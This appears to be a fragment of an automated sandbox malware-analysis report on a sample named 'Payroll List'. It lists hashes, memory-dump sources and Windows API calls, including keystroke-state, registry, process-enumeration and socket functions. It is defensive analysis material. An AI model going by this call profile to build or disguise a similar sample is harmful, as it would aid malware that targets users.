                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                    • String ID:
                                                                    • API String ID: 3356174886-0
                                                                    • Opcode ID: a12c09091d52069bce54be07237b75c7e0e41754b18e290ca8edb4f63543713d
                                                                    • Instruction ID: 0559829bfa12d634f4e379eec8abaa666727c730809bd8f9379970953b6bab25
                                                                    • Opcode Fuzzy Hash: a12c09091d52069bce54be07237b75c7e0e41754b18e290ca8edb4f63543713d
                                                                    • Instruction Fuzzy Hash: 36A1AE35600A16EFDF19CF68C9897BDBBB1BF08740F058119EC59AB294D774AE90CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6af716be60ef7ea587a97ac6aba6984848d33cba4506f2c991ddb9faec01641a
                                                                    • Instruction ID: 2b1e88696835c8f21af882b09c1ebb1db24e485a357544301e736127ddf06364
                                                                    • Instruction Fuzzy Hash: 92718BB0900109EFDF08CF98CC88AAEBB78FF85310F248149F955AB250C730AA41CFA1
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018225A
                                                                    • _memset.LIBCMT ref: 00182323
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00182368
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0018242F
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0018243E
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 4082843840-2766056989
                                                                    • Opcode ID: 4cc1298df7270b41cf5f7f62fda56a104ce0d3b9f1a77f6f34b3660a01eb901c
                                                                    • Instruction ID: 6b0b030abd04128653a4538be094b3ce5890d21a61715e38291e46eca942ff30
                                                                    • Instruction Fuzzy Hash: 6C715D74A006299FCF05EFA8D8959AEB7F5FF58310F108459E85AAB351CB34AE40CF94
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00163DE7
                                                                    • GetKeyboardState.USER32(?), ref: 00163DFC
                                                                    • SetKeyboardState.USER32(?), ref: 00163E5D
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00163E8B
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00163EAA
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00163EF0
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00163F13
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 73be3f43bdee3ba9f781903dd21d5c6b2fad9c0c6a0b4f117d0a258c116c042a
                                                                    • Instruction ID: c75b47602684583586026c5ceabc024638e13107355db78befdc39e1958cd449
                                                                    • Instruction Fuzzy Hash: C051B3A0A047D53DFB364738CC49BBA7EA95B06304F088589F0E5468C3D3A9AEE4D761
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00163C02
                                                                    • GetKeyboardState.USER32(?), ref: 00163C17
                                                                    • SetKeyboardState.USER32(?), ref: 00163C78
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00163CA4
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00163CC1
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00163D05
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00163D26
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 98a33423247c33d7e0dae943eba5f67eb00f71f5c685172f5c269f0ff7c8fd52
                                                                    • Instruction ID: 3279a3c9416a870963cb684933b3e17ade5134c38354500e36b259cdd40743e5
                                                                    • Instruction Fuzzy Hash: 975106A09047D53DFB3687748C45BB6BFA9AB06300F0C8489F1E55A8C3D795EEA4E760
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 32ce8043946a9216310c4b2039204859129d2e2b9d917941dcbf47510051fa70
                                                                    • Instruction ID: 97f85f5633e0f418cb38079939aa0f725d0ec294513606d4c395e09f55d0edb4
                                                                    • Instruction Fuzzy Hash: 6541AC66C10214B6CB11EBF4CC8A9CFB3ACAF58310F5189A6E518E3161FB74E66487A5
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00183DA1
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00183DCB
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00183E80
                                                                      • Part of subcall function 00183D72: RegCloseKey.ADVAPI32(?), ref: 00183DE8
                                                                      • Part of subcall function 00183D72: FreeLibrary.KERNEL32(?), ref: 00183E3A
                                                                      • Part of subcall function 00183D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00183E5D
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00183E25
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: a172f3bda4d91b0e647c6930697863337ecfc5de825e57e38721f5b600c7761c
                                                                    • Instruction ID: b6512993a234491bf1bc93b1a2bd52b1582cd76170d20c4d7194697dfbebe671
                                                                    • Instruction Fuzzy Hash: 7C31D9B1901209BFDB15AF94DC85AFFB7BCEB09700F04016AF522A2550D7749F899FA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00188FE7
                                                                    • GetWindowLongW.USER32(00D2DA20,000000F0), ref: 0018901A
                                                                    • GetWindowLongW.USER32(00D2DA20,000000F0), ref: 0018904F
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00189081
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001890AB
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001890BC
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001890D6
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 25fe19e94e243f3bb6944ca1ad235fcdeb64ec5a057e08a2d3c5af201e217088
                                                                    • Instruction ID: 77e4e6054b4ffd61e621e1d6ced48e6436ea92fbd529a0b03e9f5ac754a06a45
                                                                    • Instruction Fuzzy Hash: 85312A74600215EFDB219F98DC84F6537A9FB4A714F1901A4F5198F6B1CBB1A980DF41
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001608F2
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00160918
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0016091B
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160939
                                                                    • SysFreeString.OLEAUT32(?), ref: 00160942
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00160967
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160975
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d03d3ef2015ad3b3511974e8c6c0401b9b3b32209c330a508b317bb1a60b5472
                                                                    • Instruction ID: f0567c867f27617e55b3714f5b79c3ae3901fec4e52c2c3c199b74ebb8758cf0
                                                                    • Instruction Fuzzy Hash: 0F21C172601208AFEB109FB8DC88DBB73ACEB0D364B008125F909DB691D770EC41CBA0
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 6945ac1c362daa7ae8b09ff108fd8d1e14f891afc5ad7885d5babd64b98efde9
                                                                    • Instruction ID: 4aa7a75b16f4d90d25dec81c2c988fb7a0c465f7e5712ca923a75cec683bc0ea
                                                                    • Instruction Fuzzy Hash: CE216B72644A12B7C334AA349C16FFB7398EFB5340F60402AF44797181EB7599A2C3D5
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001609CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001609F1
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001609F4
                                                                    • SysAllocString.OLEAUT32 ref: 00160A15
                                                                    • SysFreeString.OLEAUT32 ref: 00160A1E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00160A38
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160A46
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d31fe487fdc860b2b1cbe09c6bb86d501a22c64482bfa534a2df5e4f0ba14f9f
                                                                    • Instruction ID: 331dd5d16541bb269c70a6b05c8de9e74254a14b4081acdac4da391f04cce78e
                                                                    • Instruction Fuzzy Hash: F0215E75605204AFDB11DBA8DC88DAB77ACEB0D3607018125F909CB6A1EB74EC818B64
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0018A32D
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0018A33A
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0018A345
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0018A354
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0018A360
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: b1d7fb4a1b1912b46f7b2f602a6829b889366639433a3ea827ab78ee0b2434db
                                                                    • Instruction ID: 912535c010c457be3a65f127acfa1985c9ead5f90dcc2101d6b90cac0eb1dcc6
                                                                    • Opcode Fuzzy Hash: b1d7fb4a1b1912b46f7b2f602a6829b889366639433a3ea827ab78ee0b2434db
                                                                    • Instruction Fuzzy Hash: 5F1160B1150219BFEF155FA4DC85EEB7F6DFF09798F014115BA08A60A0C7729C21DBA4
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 0013CCF6
                                                                    • GetWindowRect.USER32(?,?), ref: 0013CD37
                                                                    • ScreenToClient.USER32(?,?), ref: 0013CD5F
                                                                    • GetClientRect.USER32(?,?), ref: 0013CE8C
                                                                    • GetWindowRect.USER32(?,?), ref: 0013CEA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 6a25b6cb7e1adb99458c4efbcc55272cff68eb8633c5407484848fa6714437c9
                                                                    • Instruction ID: 91f63ce2680ef32c2226bb7e106b4859911fe418ea4a10f40a857ee535587733
                                                                    • Opcode Fuzzy Hash: 6a25b6cb7e1adb99458c4efbcc55272cff68eb8633c5407484848fa6714437c9
                                                                    • Instruction Fuzzy Hash: 11B15A79A00649DBDF14CFA8C4807EEBBB1FF08310F199529EC59EB254DB30A950DBA4
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00181C18
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00181C26
                                                                    • __wsplitpath.LIBCMT ref: 00181C54
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscat.LIBCMT ref: 00181C69
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00181CDF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00181CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1380811348-0
                                                                    • Opcode ID: eccf89d8c704f0b90d8feaf04064309913d256716450049a86dcfa73b1393444
                                                                    • Instruction ID: 1c6b921c37aff4a056636da9b80abda3e8f6d818fe287b6c47c0822619fae0cb
                                                                    • Opcode Fuzzy Hash: eccf89d8c704f0b90d8feaf04064309913d256716450049a86dcfa73b1393444
                                                                    • Instruction Fuzzy Hash: C5518FB2104300AFD720EF64D885EABB7ECEF98754F00491EF58A97251DB30DA05CB92
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001830AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001830EF
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00183112
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0018313B
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0018317E
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0018318B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 3451389628-0
                                                                    • Opcode ID: 18d60e4204d28e52fbfdcd6b12dd103f2442f0da2e6baa6e260fcc7f67a7dc3c
                                                                    • Instruction ID: d82b321e8bc23c826f85456f48af255b000ba015d3629c8efff4c9530fde746b
                                                                    • Opcode Fuzzy Hash: 18d60e4204d28e52fbfdcd6b12dd103f2442f0da2e6baa6e260fcc7f67a7dc3c
                                                                    • Instruction Fuzzy Hash: 98515831108300AFC704EF64D885E6EBBE9FF99704F08491DF695872A1DB71EA15CB92
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00188540
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00188577
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0018859F
                                                                    • GetMenuItemID.USER32(?,?), ref: 0018860E
                                                                    • GetSubMenu.USER32(?,?), ref: 0018861C
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0018866D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: a60331ce6575ca47a65a00cd9845ccd301bf4483ed1990b0248b8e3b2122586b
                                                                    • Instruction ID: dc71eddd2e8e6c70fcbd6cdbc2d893761fe6385f691387407796a7687be726c2
                                                                    • Opcode Fuzzy Hash: a60331ce6575ca47a65a00cd9845ccd301bf4483ed1990b0248b8e3b2122586b
                                                                    • Instruction Fuzzy Hash: 4F519C71E00624AFCF15EFA8D881AAEB7F5EF58310F114499E916BB351DB30AE418F90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00164B10
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164B5B
                                                                    • IsMenu.USER32(00000000), ref: 00164B7B
                                                                    • CreatePopupMenu.USER32 ref: 00164BAF
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00164C0D
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00164C3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: c3949633c41e881e63ab0ac37529ac71427121be608a4e104a6bb762ab4ee185
                                                                    • Instruction ID: a380ba80b6b11317e35f80257eba8dfe1923876f435d14e9a5823296842f9ea6
                                                                    • Opcode Fuzzy Hash: c3949633c41e881e63ab0ac37529ac71427121be608a4e104a6bb762ab4ee185
                                                                    • Instruction Fuzzy Hash: E151F070A01309EFCF25CF68DC88BAEBBF4AF55318F148159E4159B290E3719A64CB51
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,001BDC00), ref: 00178E7C
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178E89
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00178EAD
                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00178EC5
                                                                    • _strlen.LIBCMT ref: 00178EF7
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178F6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_strlenselect
                                                                    • String ID:
                                                                    • API String ID: 2217125717-0
                                                                    • Opcode ID: 94112dfba2e7c5d07bf2fe5a938fe156ae742a85da4054a6aebd15fb1205ecdb
                                                                    • Instruction ID: e766ecc87723a27652b48afbc4a5d5e19f9f024e144085bc529eee27bb6512f2
                                                                    • Opcode Fuzzy Hash: 94112dfba2e7c5d07bf2fe5a938fe156ae742a85da4054a6aebd15fb1205ecdb
                                                                    • Instruction Fuzzy Hash: 8541A471500104AFCB18EBA4DD9AEAEB7B9AF68314F108559F51A976D1DF30AE40CB60
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • BeginPaint.USER32(?,?,?), ref: 0013AC2A
                                                                    • GetWindowRect.USER32(?,?), ref: 0013AC8E
                                                                    • ScreenToClient.USER32(?,?), ref: 0013ACAB
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0013ACBC
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0013AD06
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0019E673
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 2592858361-0
                                                                    • Opcode ID: 03d399c232c3778cd7236fd1dbd92d81599d746c2adb111f393a78dfaa960032
                                                                    • Instruction ID: 556a337bbe432c43f6218bc8e9c0879232cc897fef9dbaea12e67c420d9aed5a
                                                                    • Opcode Fuzzy Hash: 03d399c232c3778cd7236fd1dbd92d81599d746c2adb111f393a78dfaa960032
                                                                    • Instruction Fuzzy Hash: 4241D270104300AFCB10DF64DC84FBA7BE8FF59720F040669F9A58B6A1D771A985DB62
                                                                    APIs
                                                                    • ShowWindow.USER32(001E1628,00000000,001E1628,00000000,00000000,001E1628,?,0019DC5D,00000000,?,00000000,00000000,00000000,?,0019DAD1,00000004), ref: 0018E40B
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0018E42F
                                                                    • ShowWindow.USER32(001E1628,00000000), ref: 0018E48F
                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0018E4A1
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0018E4C5
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0018E4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 3d94b0b6c246a94d65b1897bc209550353ace69a80532ffb32fae5cf8c9df9d1
                                                                    • Instruction ID: 0f295b817917d5e3f6548762958663dbbfb96ae7df35ec569793f741da6f9e62
                                                                    • Opcode Fuzzy Hash: 3d94b0b6c246a94d65b1897bc209550353ace69a80532ffb32fae5cf8c9df9d1
                                                                    • Instruction Fuzzy Hash: 0D418C34601540EFDB26DF28C489F947BE0BF0A304F1881A9EA5DCF6A2C731AA46CF51
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001698D1
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00169908
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00169924
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0016999E
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001699B3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001699D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
